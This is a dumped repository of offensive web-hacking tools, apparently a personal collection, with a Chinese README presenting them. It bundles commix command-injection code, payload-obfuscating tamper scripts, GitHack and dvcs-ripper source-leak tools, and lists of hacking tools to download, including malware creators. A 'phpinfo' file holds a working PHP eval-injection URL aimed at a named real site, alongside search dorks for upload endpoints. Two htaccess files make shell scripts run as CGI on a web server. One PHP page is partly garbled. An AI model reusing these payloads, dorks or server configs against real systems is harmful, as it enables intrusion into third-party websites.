├── GitHack ├── lib │ ├── __init__.py │ ├── __init__.pyc │ ├── parser.pyc │ └── parser.py ├── README.md └── GitHack.py ├── commix ├── src │ ├── thirdparty │ │ ├── beautifulsoup │ │ │ └── __init__.py │ │ ├── colorama │ │ │ ├── __init__.py │ │ │ ├── initialise.py │ │ │ ├── ansi.py │ │ │ ├── win32.py │ │ │ └── winterm.py │ │ └── __init__.py │ ├── __init__.py │ ├── core │ │ ├── __init__.py │ │ ├── modules │ │ │ ├── __init__.py │ │ │ ├── shellshock │ │ │ │ └── __init__.py │ │ │ ├── dns_exfiltration │ │ │ │ └── __init__.py │ │ │ ├── icmp_exfiltration │ │ │ │ └── __init__.py │ │ │ └── modules_handler.py │ │ ├── shells │ │ │ └── __init__.py │ │ ├── tamper │ │ │ ├── __init__.py │ │ │ ├── hexencode.py │ │ │ ├── space2plus.py │ │ │ ├── base64encode.py │ │ │ ├── space2tab.py │ │ │ └── space2ifs.py │ │ ├── injections │ │ │ ├── __init__.py │ │ │ ├── blind │ │ │ │ ├── __init__.py │ │ │ │ └── techniques │ │ │ │ │ ├── __init__.py │ │ │ │ │ └── time_based │ │ │ │ │ └── __init__.py │ │ │ ├── controller │ │ │ │ ├── __init__.py │ │ │ │ ├── parser.py │ │ │ │ └── shell_options.py │ │ │ ├── semiblind │ │ │ │ ├── __init__.py │ │ │ │ └── techniques │ │ │ │ │ ├── __init__.py │ │ │ │ │ ├── file_based │ │ │ │ │ ├── __init__.py │ │ │ │ │ └── fb_payloads.py │ │ │ │ │ └── tempfile_based │ │ │ │ │ └── __init__.py │ │ │ └── results_based │ │ │ │ ├── __init__.py │ │ │ │ └── techniques │ │ │ │ ├── __init__.py │ │ │ │ ├── classic │ │ │ │ ├── __init__.py │ │ │ │ └── cb_payloads.py │ │ │ │ └── eval_based │ │ │ │ ├── __init__.py │ │ │ │ └── eb_payloads.py │ │ └── requests │ │ │ ├── __init__.py │ │ │ ├── proxy.py │ │ │ ├── tor.py │ │ │ ├── redirection.py │ │ │ └── authentication.py │ ├── utils │ │ ├── __init__.py │ │ ├── requirments.py │ │ ├── colors.py │ │ ├── version.py │ │ ├── simple_http_server.py │ │ ├── crawler.py │ │ ├── install.py │ │ └── logs.py │ └── txt │ │ └── usernames.txt ├── readme │ └── AUTHOR ├── .travis.yml ├── 系统命令注入漏洞自动化测试工具 – Commix_files │ └── Image.jpg └── README.md ├── sohaip-hackerDZ ├── tools │ ├── themes │ │ ├── README.md │ │ └── village │ ├── htaccess_prv__sh │ ├── htaccess_prvsh │ ├── phpinfo │ ├── README.md │ ├── Tools_non-git.txt │ ├── thems_icon.py │ ├── local.py │ ├── index │ ├── list.txt │ └── Download_Script.sh └── download-tools-hacking │ ├── README.md │ ├── Tools_non-git.txt │ ├── list.txt │ └── Download_Script.sh ├── webshell.sh ├── Seay-Svn源代码泄露漏洞利用工具.exe ├── README.md └── dvcs-ripper ├── rip-cvs.pl ├── README.md ├── rip-hg.pl ├── rip-svn.pl └── rip-bzr.pl /GitHack/lib/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /commix/src/thirdparty/beautifulsoup/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /sohaip-hackerDZ/tools/themes/README.md: -------------------------------------------------------------------------------- 1 | README.md 2 | -------------------------------------------------------------------------------- /webshell.sh: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Introspelliam/tools/HEAD/webshell.sh -------------------------------------------------------------------------------- /GitHack/lib/__init__.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Introspelliam/tools/HEAD/GitHack/lib/__init__.pyc -------------------------------------------------------------------------------- /GitHack/lib/parser.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Introspelliam/tools/HEAD/GitHack/lib/parser.pyc -------------------------------------------------------------------------------- /Seay-Svn源代码泄露漏洞利用工具.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Introspelliam/tools/HEAD/Seay-Svn源代码泄露漏洞利用工具.exe -------------------------------------------------------------------------------- /commix/readme/AUTHOR: -------------------------------------------------------------------------------- 1 | Anastasios stasinopoulos (@ancst) 2 | 3 | PGP Key ID: 0x2D40CEBF804F5133 4 | -------------------------------------------------------------------------------- /commix/.travis.yml: -------------------------------------------------------------------------------- 1 | language: python 2 | python: 3 | - "2.6" 4 | - "2.7" 5 | script: 6 | - python -c "import commix" 7 | 8 | -------------------------------------------------------------------------------- /commix/系统命令注入漏洞自动化测试工具 – Commix_files/Image.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Introspelliam/tools/HEAD/commix/系统命令注入漏洞自动化测试工具 – Commix_files/Image.jpg -------------------------------------------------------------------------------- /sohaip-hackerDZ/tools/htaccess_prv__sh: -------------------------------------------------------------------------------- 1 | Options FollowSymLinks MultiViews Indexes ExecCGI 2 | 3 | AddType application/x-httpd-cgi .sh 4 | 5 | AddHandler cgi-script .sh 6 | AddHandler cgi-script .sh 7 | -------------------------------------------------------------------------------- /sohaip-hackerDZ/tools/htaccess_prvsh: -------------------------------------------------------------------------------- 1 | Options FollowSymLinks MultiViews Indexes ExecCGI 2 | 3 | AddType application/x-httpd-cgi .sh 4 | 5 | AddHandler cgi-script .sh 6 | AddHandler cgi-script .sh 7 | -------------------------------------------------------------------------------- /sohaip-hackerDZ/tools/phpinfo: -------------------------------------------------------------------------------- 1 | http://cosfun.net/core//lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection{}eval($_GET[w]);class%20zZz_ADOConnection{}//&w=phpinfo(); 2 | Index of /plugins/jbimages 3 | inurl:/plupload/upload.php 4 | -------------------------------------------------------------------------------- /sohaip-hackerDZ/download-tools-hacking/README.md: -------------------------------------------------------------------------------- 1 | # Git_Pentesting_Toolkit 2 | Exploit pack for pentesters and ethical hackers. 3 | **Git required to use installer bash script.** 4 | **Linux preferred** 5 | 6 |

Current number of tools : 196

7 | 8 | 9 | -------------------------------------------------------------------------------- /commix/src/thirdparty/colorama/__init__.py: -------------------------------------------------------------------------------- 1 | 2 | # Copyright Jonathan Hartley 2013. BSD 3-Clause license, see LICENSE file. 3 | from .initialise import init, deinit, reinit 4 | from .ansi import Fore, Back, Style, Cursor 5 | from .ansitowin32 import AnsiToWin32 6 | 7 | __version__ = '0.3.3' 8 | -------------------------------------------------------------------------------- /sohaip-hackerDZ/tools/README.md: -------------------------------------------------------------------------------- 1 | # Git_Pentesting_Toolkit 2 | Exploit pack for pentesters and ethical hackers. 3 | **Git required to use installer bash script.** 4 | **Linux preferred** 5 | 6 |

Current number of tools : 196

7 | 8 | [![asciicast](https://asciinema.org/a/a4lud558ectt3bjur83ey5em2.png)](https://asciinema.org/a/a4lud558ectt3bjur83ey5em2?autoplay=1) 9 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # 工具说明 2 | 3 | ## sohaip-hackerDZ 4 | 这是一位工具开发能力很强的黑客,其使用了perl语言开发了一个较为通用的cgi_rce的脚本 5 | 其中download-tools-hacking是转为渗透测试者或者白帽子准备的工具清单以及下载脚本 6 | tools是准备的工具 7 | 8 | ## commix 9 | commix是一个rce的常用工具,但是由于设计上的缺陷,这个工具使用时会感觉不太友好 10 | 11 | ## Seay-svn 12 | 这是一个专门针对svn泄露的工具,可以通过该工具对网站所在的地址上的文件下载和阅读 13 | 14 | ## GitHack 15 | 这是一个专门针对git泄露的工具,可以通过该工具对网站所在的地址上的文件进行下载 16 | 17 | ## dvcs-ripper 18 | 这是一款用Perl语言实现的支持git/svn/cvs泄露的工具 -------------------------------------------------------------------------------- /commix/src/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # encoding: UTF-8 3 | 4 | """ 5 | This file is part of Commix Project (http://commixproject.com). 6 | Copyright (c) 2014-2017 Anastasios Stasinopoulos (@ancst). 7 | 8 | This program is free software: you can redistribute it and/or modify 9 | it under the terms of the GNU General Public License as published by 10 | the Free Software Foundation, either version 3 of the License, or 11 | (at your option) any later version. 12 | 13 | For more see the file 'readme/COPYING' for copying permission. 14 | """ 15 | 16 | pass -------------------------------------------------------------------------------- /commix/src/core/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # encoding: UTF-8 3 | 4 | """ 5 | This file is part of Commix Project (http://commixproject.com). 6 | Copyright (c) 2014-2017 Anastasios Stasinopoulos (@ancst). 7 | 8 | This program is free software: you can redistribute it and/or modify 9 | it under the terms of the GNU General Public License as published by 10 | the Free Software Foundation, either version 3 of the License, or 11 | (at your option) any later version. 12 | 13 | For more see the file 'readme/COPYING' for copying permission. 14 | """ 15 | 16 | pass -------------------------------------------------------------------------------- /commix/src/utils/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # encoding: UTF-8 3 | 4 | """ 5 | This file is part of Commix Project (http://commixproject.com). 6 | Copyright (c) 2014-2017 Anastasios Stasinopoulos (@ancst). 7 | 8 | This program is free software: you can redistribute it and/or modify 9 | it under the terms of the GNU General Public License as published by 10 | the Free Software Foundation, either version 3 of the License, or 11 | (at your option) any later version. 12 | 13 | For more see the file 'readme/COPYING' for copying permission. 14 | """ 15 | 16 | pass -------------------------------------------------------------------------------- /commix/src/core/modules/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # encoding: UTF-8 3 | 4 | """ 5 | This file is part of Commix Project (http://commixproject.com). 6 | Copyright (c) 2014-2017 Anastasios Stasinopoulos (@ancst). 7 | 8 | This program is free software: you can redistribute it and/or modify 9 | it under the terms of the GNU General Public License as published by 10 | the Free Software Foundation, either version 3 of the License, or 11 | (at your option) any later version. 12 | 13 | For more see the file 'readme/COPYING' for copying permission. 14 | """ 15 | 16 | pass -------------------------------------------------------------------------------- /commix/src/core/shells/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # encoding: UTF-8 3 | 4 | """ 5 | This file is part of Commix Project (http://commixproject.com). 6 | Copyright (c) 2014-2017 Anastasios Stasinopoulos (@ancst). 7 | 8 | This program is free software: you can redistribute it and/or modify 9 | it under the terms of the GNU General Public License as published by 10 | the Free Software Foundation, either version 3 of the License, or 11 | (at your option) any later version. 12 | 13 | For more see the file 'readme/COPYING' for copying permission. 14 | """ 15 | 16 | pass -------------------------------------------------------------------------------- /commix/src/core/tamper/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # encoding: UTF-8 3 | 4 | """ 5 | This file is part of Commix Project (http://commixproject.com). 6 | Copyright (c) 2014-2017 Anastasios Stasinopoulos (@ancst). 7 | 8 | This program is free software: you can redistribute it and/or modify 9 | it under the terms of the GNU General Public License as published by 10 | the Free Software Foundation, either version 3 of the License, or 11 | (at your option) any later version. 12 | 13 | For more see the file 'readme/COPYING' for copying permission. 14 | """ 15 | 16 | pass -------------------------------------------------------------------------------- /commix/src/thirdparty/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # encoding: UTF-8 3 | 4 | """ 5 | This file is part of Commix Project (http://commixproject.com). 6 | Copyright (c) 2014-2017 Anastasios Stasinopoulos (@ancst). 7 | 8 | This program is free software: you can redistribute it and/or modify 9 | it under the terms of the GNU General Public License as published by 10 | the Free Software Foundation, either version 3 of the License, or 11 | (at your option) any later version. 12 | 13 | For more see the file 'readme/COPYING' for copying permission. 14 | """ 15 | 16 | pass -------------------------------------------------------------------------------- /commix/src/core/injections/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # encoding: UTF-8 3 | 4 | """ 5 | This file is part of Commix Project (http://commixproject.com). 6 | Copyright (c) 2014-2017 Anastasios Stasinopoulos (@ancst). 7 | 8 | This program is free software: you can redistribute it and/or modify 9 | it under the terms of the GNU General Public License as published by 10 | the Free Software Foundation, either version 3 of the License, or 11 | (at your option) any later version. 12 | 13 | For more see the file 'readme/COPYING' for copying permission. 14 | """ 15 | 16 | pass -------------------------------------------------------------------------------- /commix/src/core/requests/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # encoding: UTF-8 3 | 4 | """ 5 | This file is part of Commix Project (http://commixproject.com). 6 | Copyright (c) 2014-2017 Anastasios Stasinopoulos (@ancst). 7 | 8 | This program is free software: you can redistribute it and/or modify 9 | it under the terms of the GNU General Public License as published by 10 | the Free Software Foundation, either version 3 of the License, or 11 | (at your option) any later version. 12 | 13 | For more see the file 'readme/COPYING' for copying permission. 14 | """ 15 | 16 | pass -------------------------------------------------------------------------------- /commix/src/core/injections/blind/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # encoding: UTF-8 3 | 4 | """ 5 | This file is part of Commix Project (http://commixproject.com). 6 | Copyright (c) 2014-2017 Anastasios Stasinopoulos (@ancst). 7 | 8 | This program is free software: you can redistribute it and/or modify 9 | it under the terms of the GNU General Public License as published by 10 | the Free Software Foundation, either version 3 of the License, or 11 | (at your option) any later version. 12 | 13 | For more see the file 'readme/COPYING' for copying permission. 14 | """ 15 | 16 | pass -------------------------------------------------------------------------------- /commix/src/core/injections/controller/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # encoding: UTF-8 3 | 4 | """ 5 | This file is part of Commix Project (http://commixproject.com). 6 | Copyright (c) 2014-2017 Anastasios Stasinopoulos (@ancst). 7 | 8 | This program is free software: you can redistribute it and/or modify 9 | it under the terms of the GNU General Public License as published by 10 | the Free Software Foundation, either version 3 of the License, or 11 | (at your option) any later version. 12 | 13 | For more see the file 'readme/COPYING' for copying permission. 14 | """ 15 | 16 | pass -------------------------------------------------------------------------------- /commix/src/core/injections/semiblind/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # encoding: UTF-8 3 | 4 | """ 5 | This file is part of Commix Project (http://commixproject.com). 6 | Copyright (c) 2014-2017 Anastasios Stasinopoulos (@ancst). 7 | 8 | This program is free software: you can redistribute it and/or modify 9 | it under the terms of the GNU General Public License as published by 10 | the Free Software Foundation, either version 3 of the License, or 11 | (at your option) any later version. 12 | 13 | For more see the file 'readme/COPYING' for copying permission. 14 | """ 15 | 16 | pass -------------------------------------------------------------------------------- /commix/src/core/modules/shellshock/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # encoding: UTF-8 3 | 4 | """ 5 | This file is part of Commix Project (http://commixproject.com). 6 | Copyright (c) 2014-2017 Anastasios Stasinopoulos (@ancst). 7 | 8 | This program is free software: you can redistribute it and/or modify 9 | it under the terms of the GNU General Public License as published by 10 | the Free Software Foundation, either version 3 of the License, or 11 | (at your option) any later version. 12 | 13 | For more see the file 'readme/COPYING' for copying permission. 14 | """ 15 | 16 | pass -------------------------------------------------------------------------------- /commix/src/core/injections/blind/techniques/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # encoding: UTF-8 3 | 4 | """ 5 | This file is part of Commix Project (http://commixproject.com). 6 | Copyright (c) 2014-2017 Anastasios Stasinopoulos (@ancst). 7 | 8 | This program is free software: you can redistribute it and/or modify 9 | it under the terms of the GNU General Public License as published by 10 | the Free Software Foundation, either version 3 of the License, or 11 | (at your option) any later version. 12 | 13 | For more see the file 'readme/COPYING' for copying permission. 14 | """ 15 | 16 | pass -------------------------------------------------------------------------------- /commix/src/core/injections/results_based/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # encoding: UTF-8 3 | 4 | """ 5 | This file is part of Commix Project (http://commixproject.com). 6 | Copyright (c) 2014-2017 Anastasios Stasinopoulos (@ancst). 7 | 8 | This program is free software: you can redistribute it and/or modify 9 | it under the terms of the GNU General Public License as published by 10 | the Free Software Foundation, either version 3 of the License, or 11 | (at your option) any later version. 12 | 13 | For more see the file 'readme/COPYING' for copying permission. 14 | """ 15 | 16 | pass -------------------------------------------------------------------------------- /commix/src/core/modules/dns_exfiltration/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # encoding: UTF-8 3 | 4 | """ 5 | This file is part of Commix Project (http://commixproject.com). 6 | Copyright (c) 2014-2017 Anastasios Stasinopoulos (@ancst). 7 | 8 | This program is free software: you can redistribute it and/or modify 9 | it under the terms of the GNU General Public License as published by 10 | the Free Software Foundation, either version 3 of the License, or 11 | (at your option) any later version. 12 | 13 | For more see the file 'readme/COPYING' for copying permission. 14 | """ 15 | 16 | pass -------------------------------------------------------------------------------- /commix/src/core/modules/icmp_exfiltration/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # encoding: UTF-8 3 | 4 | """ 5 | This file is part of Commix Project (http://commixproject.com). 6 | Copyright (c) 2014-2017 Anastasios Stasinopoulos (@ancst). 7 | 8 | This program is free software: you can redistribute it and/or modify 9 | it under the terms of the GNU General Public License as published by 10 | the Free Software Foundation, either version 3 of the License, or 11 | (at your option) any later version. 12 | 13 | For more see the file 'readme/COPYING' for copying permission. 14 | """ 15 | 16 | pass -------------------------------------------------------------------------------- /commix/src/core/injections/semiblind/techniques/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # encoding: UTF-8 3 | 4 | """ 5 | This file is part of Commix Project (http://commixproject.com). 6 | Copyright (c) 2014-2017 Anastasios Stasinopoulos (@ancst). 7 | 8 | This program is free software: you can redistribute it and/or modify 9 | it under the terms of the GNU General Public License as published by 10 | the Free Software Foundation, either version 3 of the License, or 11 | (at your option) any later version. 12 | 13 | For more see the file 'readme/COPYING' for copying permission. 14 | """ 15 | 16 | pass -------------------------------------------------------------------------------- /commix/src/core/injections/results_based/techniques/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # encoding: UTF-8 3 | 4 | """ 5 | This file is part of Commix Project (http://commixproject.com). 6 | Copyright (c) 2014-2017 Anastasios Stasinopoulos (@ancst). 7 | 8 | This program is free software: you can redistribute it and/or modify 9 | it under the terms of the GNU General Public License as published by 10 | the Free Software Foundation, either version 3 of the License, or 11 | (at your option) any later version. 12 | 13 | For more see the file 'readme/COPYING' for copying permission. 14 | """ 15 | 16 | pass -------------------------------------------------------------------------------- /commix/src/core/injections/blind/techniques/time_based/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # encoding: UTF-8 3 | 4 | """ 5 | This file is part of Commix Project (http://commixproject.com). 6 | Copyright (c) 2014-2017 Anastasios Stasinopoulos (@ancst). 7 | 8 | This program is free software: you can redistribute it and/or modify 9 | it under the terms of the GNU General Public License as published by 10 | the Free Software Foundation, either version 3 of the License, or 11 | (at your option) any later version. 12 | 13 | For more see the file 'readme/COPYING' for copying permission. 14 | """ 15 | 16 | pass -------------------------------------------------------------------------------- /commix/src/core/injections/semiblind/techniques/file_based/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # encoding: UTF-8 3 | 4 | """ 5 | This file is part of Commix Project (http://commixproject.com). 6 | Copyright (c) 2014-2017 Anastasios Stasinopoulos (@ancst). 7 | 8 | This program is free software: you can redistribute it and/or modify 9 | it under the terms of the GNU General Public License as published by 10 | the Free Software Foundation, either version 3 of the License, or 11 | (at your option) any later version. 12 | 13 | For more see the file 'readme/COPYING' for copying permission. 14 | """ 15 | 16 | pass -------------------------------------------------------------------------------- /commix/src/core/injections/results_based/techniques/classic/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # encoding: UTF-8 3 | 4 | """ 5 | This file is part of Commix Project (http://commixproject.com). 6 | Copyright (c) 2014-2017 Anastasios Stasinopoulos (@ancst). 7 | 8 | This program is free software: you can redistribute it and/or modify 9 | it under the terms of the GNU General Public License as published by 10 | the Free Software Foundation, either version 3 of the License, or 11 | (at your option) any later version. 12 | 13 | For more see the file 'readme/COPYING' for copying permission. 14 | """ 15 | 16 | pass -------------------------------------------------------------------------------- /commix/src/core/injections/results_based/techniques/eval_based/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # encoding: UTF-8 3 | 4 | """ 5 | This file is part of Commix Project (http://commixproject.com). 6 | Copyright (c) 2014-2017 Anastasios Stasinopoulos (@ancst). 7 | 8 | This program is free software: you can redistribute it and/or modify 9 | it under the terms of the GNU General Public License as published by 10 | the Free Software Foundation, either version 3 of the License, or 11 | (at your option) any later version. 12 | 13 | For more see the file 'readme/COPYING' for copying permission. 14 | """ 15 | 16 | pass -------------------------------------------------------------------------------- /commix/src/core/injections/semiblind/techniques/tempfile_based/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # encoding: UTF-8 3 | 4 | """ 5 | This file is part of Commix Project (http://commixproject.com). 6 | Copyright (c) 2014-2017 Anastasios Stasinopoulos (@ancst). 7 | 8 | This program is free software: you can redistribute it and/or modify 9 | it under the terms of the GNU General Public License as published by 10 | the Free Software Foundation, either version 3 of the License, or 11 | (at your option) any later version. 12 | 13 | For more see the file 'readme/COPYING' for copying permission. 14 | """ 15 | 16 | pass -------------------------------------------------------------------------------- /sohaip-hackerDZ/tools/themes/village: -------------------------------------------------------------------------------- 1 | Colly Sehat :v 4 |
5 | Target : 6 |
7 | Postname : 8 |
9 | 10 |
'; 11 | if(!empty($_GET[tar]) AND !empty($_GET[psn])){ 12 | $target = $_GET[tar]; 13 | $spc = array('<', '>', '&'); 14 | $spv = array('<', '>', '&'); 15 | $postname = str_replace($spc, $spv, $_GET[psn]); 16 | echo '
17 |
18 | 19 |
'; 20 | }else{ 21 | echo ''; 22 | } 23 | ?> 24 | -------------------------------------------------------------------------------- /commix/src/core/tamper/hexencode.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # encoding: UTF-8 3 | 4 | """ 5 | This file is part of Commix Project (http://commixproject.com). 6 | Copyright (c) 2014-2017 Anastasios Stasinopoulos (@ancst). 7 | 8 | This program is free software: you can redistribute it and/or modify 9 | it under the terms of the GNU General Public License as published by 10 | the Free Software Foundation, either version 3 of the License, or 11 | (at your option) any later version. 12 | 13 | For more see the file 'readme/COPYING' for copying permission. 14 | """ 15 | 16 | import urllib 17 | from src.utils import settings 18 | 19 | """ 20 | Hex all characters in a given payload. 21 | """ 22 | 23 | if not settings.TAMPER_SCRIPTS['hexencode']: 24 | settings.TAMPER_SCRIPTS['hexencode'] = True 25 | 26 | def encode(payload): 27 | payload = urllib.unquote(payload) 28 | payload = payload.encode("hex") 29 | return payload 30 | 31 | #eof -------------------------------------------------------------------------------- /commix/src/core/tamper/space2plus.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # encoding: UTF-8 3 | 4 | """ 5 | This file is part of Commix Project (http://commixproject.com). 6 | Copyright (c) 2014-2017 Anastasios Stasinopoulos (@ancst). 7 | 8 | This program is free software: you can redistribute it and/or modify 9 | it under the terms of the GNU General Public License as published by 10 | the Free Software Foundation, either version 3 of the License, or 11 | (at your option) any later version. 12 | 13 | For more see the file 'readme/COPYING' for copying permission. 14 | """ 15 | 16 | from src.utils import settings 17 | 18 | """ 19 | Replaces space character (' ') with plus ('+') 20 | Notes: 21 | * This tamper script works against all targets. 22 | """ 23 | 24 | settings.TAMPER_SCRIPTS['space2plus'] = True 25 | if settings.WHITESPACE[0] == "%20" or settings.WHITESPACE[0] == " ": 26 | settings.WHITESPACE[0] = "+" 27 | else: 28 | settings.WHITESPACE.append("+") 29 | 30 | #eof -------------------------------------------------------------------------------- /GitHack/README.md: -------------------------------------------------------------------------------- 1 | GitHack 2 | = 3 | 4 | GitHack is a `.git` folder disclosure exploit. 5 | 6 | It rebuild source code from .git folder while keep directory structure unchanged. 7 | 8 | GitHack是一个.git泄露利用脚本,通过泄露的.git文件夹下的文件,重建还原工程源代码。 9 | 10 | 渗透测试人员、攻击者,可以进一步审计代码,挖掘:文件上传,SQL注射等安全漏洞。 11 | 12 | ## 脚本的工作原理 ## 13 | 14 | * 解析.git/index文件,找到工程中所有的: ( 文件名,文件sha1 ) 15 | * 去.git/objects/ 文件夹下下载对应的文件 16 | * zlib解压文件,按原始的目录结构写入源代码 17 | 18 | ## 它的优点 ## 19 | 20 | * 速度快,默认20个工作线程 21 | * 尽量还原所有的源代码,缺失部分文件不影响脚本工作 22 | * 脚本不需要执行额外的git命令,All you need is python 23 | * 脚本无需浏览目录 24 | 25 | ## 可能的改进## 26 | 27 | * 存在文件被gc打包到git\objects\pack的情况,稍后可测试下看能否直接获取并解压这个文件,还原源代码 28 | 29 | ##用法示例## 30 | GitHack.py http://www.openssl.org/.git/ 31 | 32 | ##反馈## 33 | * my[at]lijiejie.com 34 | * [http://www.lijiejie.com](http://www.lijiejie.com) 35 | 36 | ##Thanks## 37 | Thanks for sbp's great work, I used his .git index parser [gin - a Git index file parser](https://github.com/sbp/gin) 38 | 39 | -------------------------------------------------------------------------------- /commix/src/core/tamper/base64encode.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # encoding: UTF-8 3 | 4 | """ 5 | This file is part of Commix Project (http://commixproject.com). 6 | Copyright (c) 2014-2017 Anastasios Stasinopoulos (@ancst). 7 | 8 | This program is free software: you can redistribute it and/or modify 9 | it under the terms of the GNU General Public License as published by 10 | the Free Software Foundation, either version 3 of the License, or 11 | (at your option) any later version. 12 | 13 | For more see the file 'readme/COPYING' for copying permission. 14 | """ 15 | 16 | import base64 17 | import urllib 18 | from src.utils import settings 19 | 20 | """ 21 | Base64 all characters in a given payload. 22 | """ 23 | 24 | if not settings.TAMPER_SCRIPTS['base64encode']: 25 | settings.TAMPER_SCRIPTS['base64encode'] = True 26 | 27 | def encode(payload): 28 | payload = urllib.unquote(payload) 29 | payload = base64.b64encode(payload) 30 | return payload 31 | 32 | #eof -------------------------------------------------------------------------------- /commix/src/core/tamper/space2tab.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # encoding: UTF-8 3 | 4 | """ 5 | This file is part of Commix Project (http://commixproject.com). 6 | Copyright (c) 2014-2017 Anastasios Stasinopoulos (@ancst). 7 | 8 | This program is free software: you can redistribute it and/or modify 9 | it under the terms of the GNU General Public License as published by 10 | the Free Software Foundation, either version 3 of the License, or 11 | (at your option) any later version. 12 | 13 | For more see the file 'readme/COPYING' for copying permission. 14 | """ 15 | 16 | from src.utils import settings 17 | 18 | """ 19 | Replaces space character (' ') with plus ('%09') 20 | Notes: 21 | * This tamper script works against all targets. 22 | """ 23 | 24 | settings.TAMPER_SCRIPTS['space2tab'] = True 25 | if settings.WHITESPACE[0] == "%20" or settings.WHITESPACE[0] == " ": 26 | settings.WHITESPACE[0] = "%09" 27 | else: 28 | settings.WHITESPACE.append("%09") 29 | 30 | #eof -------------------------------------------------------------------------------- /sohaip-hackerDZ/tools/Tools_non-git.txt: -------------------------------------------------------------------------------- 1 | These are tools which aren't obtainable with Git. 2 | You'll have to download these manually. :( 3 | I'll also include what I believe the tools would be catagorized under incase you decide to sort them. 4 | 5 | --Cracking-- 6 | https://labs.portcullis.co.uk/download/acccheck-0-2-1.tar.gz 7 | --Malware_Creation-- 8 | https://www.shellterproject.com/download/ 9 | --Reverse_Engineering-- 10 | http://flasm.sourceforge.net 11 | http://www.aspectsecurity.com/tools/javasnoop 12 | http://malzilla.sourceforge.net/ 13 | --Stress_Testing-- 14 | https://sourceforge.net/projects/t50/ 15 | --Other-- 16 | http://www.dosbox.com/download.php?main=1 17 | https://www.paterva.com/web7/buy/maltego-clients/maltego-ce.php 18 | --Web_Server_Exploitation-- 19 | https://code.google.com/archive/p/cms-explorer/downloads 20 | http://blindelephant.sourceforge.net/ 21 | --Wireless_Exploitation-- 22 | http://www.willhackforsushi.com/code/cowpatty/4.6/cowpatty-4.6.tgz 23 | -------------------------------------------------------------------------------- /sohaip-hackerDZ/download-tools-hacking/Tools_non-git.txt: -------------------------------------------------------------------------------- 1 | These are tools which aren't obtainable with Git. 2 | You'll have to download these manually. :( 3 | I'll also include what I believe the tools would be catagorized under incase you decide to sort them. 4 | 5 | --Cracking-- 6 | https://labs.portcullis.co.uk/download/acccheck-0-2-1.tar.gz 7 | --Malware_Creation-- 8 | https://www.shellterproject.com/download/ 9 | --Reverse_Engineering-- 10 | http://flasm.sourceforge.net 11 | http://www.aspectsecurity.com/tools/javasnoop 12 | http://malzilla.sourceforge.net/ 13 | --Stress_Testing-- 14 | https://sourceforge.net/projects/t50/ 15 | --Other-- 16 | http://www.dosbox.com/download.php?main=1 17 | https://www.paterva.com/web7/buy/maltego-clients/maltego-ce.php 18 | --Web_Server_Exploitation-- 19 | https://code.google.com/archive/p/cms-explorer/downloads 20 | http://blindelephant.sourceforge.net/ 21 | --Wireless_Exploitation-- 22 | http://www.willhackforsushi.com/code/cowpatty/4.6/cowpatty-4.6.tgz 23 | -------------------------------------------------------------------------------- /commix/src/utils/requirments.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # encoding: UTF-8 3 | 4 | """ 5 | This file is part of Commix Project (http://commixproject.com). 6 | Copyright (c) 2014-2017 Anastasios Stasinopoulos (@ancst). 7 | 8 | This program is free software: you can redistribute it and/or modify 9 | it under the terms of the GNU General Public License as published by 10 | the Free Software Foundation, either version 3 of the License, or 11 | (at your option) any later version. 12 | 13 | For more see the file 'readme/COPYING' for copying permission. 14 | """ 15 | import os 16 | import subprocess 17 | 18 | """ 19 | Check for requirments. 20 | """ 21 | def do_check(requirment): 22 | try: 23 | # Pipe output to the file path of the null device, for silence. 24 | # i.e '/dev/null' for POSIX, 'nul' for Windows 25 | null = open(os.devnull,"w") 26 | subprocess.Popen(requirment, stdout=null, stderr=null) 27 | null.close() 28 | return True 29 | 30 | except OSError: 31 | return False 32 | 33 | # eof -------------------------------------------------------------------------------- /commix/src/utils/colors.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # 